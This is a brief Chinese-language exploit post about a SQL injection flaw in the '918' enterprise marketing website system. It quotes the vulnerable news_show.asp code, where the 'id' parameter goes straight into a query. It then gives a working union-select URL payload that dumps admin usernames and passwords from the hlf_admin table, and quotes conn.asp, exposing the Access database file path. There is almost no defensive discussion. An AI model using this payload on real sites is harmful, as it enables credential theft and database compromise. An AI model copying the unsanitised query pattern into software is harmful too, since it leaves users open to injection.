918企业营销网站展示系统注入爆数据库漏洞

\news_show.asp：

\news_show.asp
<%
id=request.QueryString("id")
k=request.QueryString("k")
%>
       <%
                        set rs3=server.CreateObject("adodb.recordset")
                        sql3="select * from hlf_news where id="&id
                        rs3.open sql3,conn,1,1
                        if not rs3.eof then
%>
 

过滤问题：

http://127.0.0.1/news_show.asp?id=106 union select 1,admin,3,4,password,6 from hlf_admin

再看后台的conn.asp：

conn.asp

<%
db="../databases/##hongquan.mdb" '数据库文件位置
'on error resume next      '不知道为什么给注释了
set conn=Server.Createobject("adodb.connection") 
conn.open"Provider=Microsoft.Jet.OLEDB.4.0;"&"Data Source=" & Server.MapPath(db)
%>
 

国际问题了。